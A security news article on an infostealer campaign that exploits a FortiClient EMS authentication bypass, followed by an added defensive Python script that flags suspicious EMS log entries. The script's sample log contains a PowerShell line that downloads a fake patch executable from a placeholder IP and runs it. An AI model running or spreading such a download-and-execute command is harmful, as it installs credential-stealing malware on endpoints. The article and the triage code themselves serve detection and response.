New infostealer reaches enterprise devices through FortiClient EMS vulnerability

Attackers are delivering a broad-spectrum infostealer to enterprise computers by exploiting a known vulnerability (CVE-2026-35616) in FortiClient Enterprise Management Server (EMS).

“The [malicious] payload was presented as a Fortinet endpoint update and executed through FortiClient-managed VPN scripting workflows,” Arctic Wolf researchers noted.

About CVE-2026-35616

CVE-2026-35616 is an improper access control vulnerability in FortiClient EMS, a centralized management platform through which IT admins deploy, configure, and monitor FortiClient endpoint security software across all devices in an organization’s network.

The vulnerability was publicly disclosed in early April by Fortinet, after Defused Cyber spotted it being exploited as a zero-day. Details about the attacks were unavailable at the time.

The attacks observed by Arctic Wolf happened in May 2026.

The attack campaign

CVE-2026-35616 allows attackers to bypass API authentication and authorization.

“When specially crafted HTTP requests are sent to certain FortiClient EMS endpoints without valid credentials, the requests are processed as if they were legitimate administrative actions. From that point onward, threat actors can interact with EMS functionality that would normally require administrative access,” Arctic Wolf researchers explained.

“Several follow-on actions were performed by the threat actor, such as updating the remind_upgrade_after configuration to defer firmware upgrade reminders, as well as editing the Remote Access Profile configuration and endpoint policy to insert a malicious script for execution on endpoint devices.”

The malicious payload (FortiEndpoint_Patch.exe) delivered to target endpoints is a MinGW-compiled Windows credential stealer the researchers dubbed EKZ Infostealer.

The malware is capable of harvesting session cookies, credentials and autofill data stored by browsers and software using the Chromium and Gecko engines: Google Chrome, Microsoft Edge, Opera, Brave, Vivaldi, Mozilla’s Firefox (and its Thunderbird email client), the Tor Browser, LibreWolf, Pale Moon, and others.

“While not directly observed in this infection chain, several other malicious samples were recovered from the threat-actor-controlled HTTP server,” the researchers noted. Those samples had file names like FortiEndpoint_Patch.2.4.9.zip, Microsoftr Windowsr Operating System-Installer.exe, and fil_api_ms_win_crt_apibase_l1_1_0.dll.

Investigation and remediation

Arctic Wolf shared known indicators of compromise tied to this attack campaign and has urged organizations using FortiClient EMS to check their logs for specific headers showing certificate errors, new account creation, suspicious or unfamiliar logins, and configuration changes that enable script execution on endpoints.
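As an illustration of that log review, the following triage script is an added example, not Arctic Wolf's tooling and not Fortinet's log schema. It walks a set of constructed, hypothetical EMS-style log lines and flags the four indicator classes named above (certificate errors, new accounts, logins from outside a trusted source set, and the remind_upgrade_after / Remote Access Profile script changes described in the report), then groups the hits by actor and extracts any download URL from an inserted script as a network IOC. The log layout, field names, IP addresses, account names and the sample payload URL are all assumptions made for this example; the regular expressions would need to be adapted to a real EMS log export.

```python
import re
from collections import defaultdict

# Assumed environment facts for the example (not from the report):
TRUSTED_SOURCES = {"10.0.5.12"}   # the admin jump host EMS logins normally come from
KNOWN_ACCOUNTS = {"admin"}        # EMS accounts that existed before the suspected window

# Constructed sample log. The "<ts> <level> <event>: <detail>" layout and the
# key=value field names are hypothetical, not Fortinet's real EMS log schema.
SAMPLE_LOG = """\
2026-05-03T08:12:01Z INFO login: user=admin src=10.0.5.12 result=success
2026-05-03T08:14:44Z WARN tls: certificate verification failed for peer 203.0.113.77
2026-05-03T08:15:02Z INFO account: created user=svc_backup by=admin src=203.0.113.77
2026-05-03T08:15:30Z INFO login: user=svc_backup src=203.0.113.77 result=success
2026-05-03T08:16:10Z INFO config: key=remind_upgrade_after old=7 new=365 by=svc_backup
2026-05-03T08:17:55Z INFO config: remote_access_profile=Corp-VPN field=on_connect_script new="powershell -ep bypass -c iwr http://203.0.113.77/FortiEndpoint_Patch.exe -OutFile f.exe; ./f.exe" by=svc_backup
2026-05-03T09:00:00Z INFO login: user=admin src=10.0.5.12 result=success
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
URL_RE = re.compile(r"https?://\S+")


def parse_line(line):
    """Split one log line into a record; returns None for lines that do not fit the layout."""
    try:
        ts, _level, rest = line.split(" ", 2)
    except ValueError:
        return None
    event, sep, detail = rest.partition(": ")
    if not sep:
        return None
    fields = {k: v.strip('"') for k, v in FIELD_RE.findall(detail)}
    return {"ts": ts, "event": event, "detail": detail, "fields": fields}


def classify(rec, trusted_sources, known_accounts):
    """Map a record to one of the indicator classes, or None if it looks benign."""
    ev, f, detail = rec["event"], rec["fields"], rec["detail"]
    if ev == "tls" and "certificate" in detail:
        return "certificate error"
    if ev == "account" and detail.startswith("created"):
        return "new account created"
    if ev == "login" and f.get("result") == "success":
        # Either an unexpected source or an account we did not know about is suspicious.
        if f.get("src") not in trusted_sources or f.get("user") not in known_accounts:
            return "unfamiliar login"
    if ev == "config":
        if f.get("key") == "remind_upgrade_after":
            return "upgrade reminder deferred"
        if "remote_access_profile" in f and f.get("field", "").endswith("script"):
            return "script inserted into Remote Access Profile"
    return None


def triage(lines, trusted_sources=TRUSTED_SOURCES, known_accounts=KNOWN_ACCOUNTS):
    """Return the flagged records, each tagged with a label and the actor behind it."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec, trusted_sources, known_accounts)
        if label is None:
            continue
        f = rec["fields"]
        ip_in_detail = IP_RE.search(rec["detail"])
        # Prefer explicit src/by fields; fall back to any IP mentioned in free text.
        actor = f.get("src") or f.get("by") or (ip_in_detail.group(0) if ip_in_detail else "unknown")
        findings.append({"ts": rec["ts"], "label": label, "actor": actor, "detail": rec["detail"]})
    return findings


def by_actor(findings):
    """Group labels by actor so one IP or account can be read as a timeline."""
    grouped = defaultdict(list)
    for fnd in findings:
        grouped[fnd["actor"]].append(fnd["label"])
    return dict(grouped)


def script_urls(findings):
    """Pull download URLs out of inserted scripts; these become network IOCs to block."""
    urls = []
    for fnd in findings:
        if fnd["label"].startswith("script inserted"):
            urls.extend(URL_RE.findall(fnd["detail"]))
    return urls


if __name__ == "__main__":
    found = triage(SAMPLE_LOG.splitlines())
    for fnd in found:
        print(f"{fnd['ts']}  {fnd['label']:<45} actor={fnd['actor']}")
    print("payload URLs:", script_urls(found))
```

Grouping by actor is the useful part: on the constructed input the certificate error, the account creation and the first unfamiliar login all trace back to one external address, and the two configuration changes are made by the account that address created, which is the chain of events a responder wants to see before deciding which sessions to revoke and which endpoints received the modified profile.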

The researchers also warned that the stolen cookies and credentials may be used by attackers for “follow-on access to cloud services, internal applications, and other authenticated resources”.

If evidence of compromise is found, a thorough remediation process must include changing affected passwords and revoking active sessions across all potentially affected services. Depending on the autofill data saved by the browsers, further action may be needed (e.g., cancelling and reissuing payment cards whose details were stored).
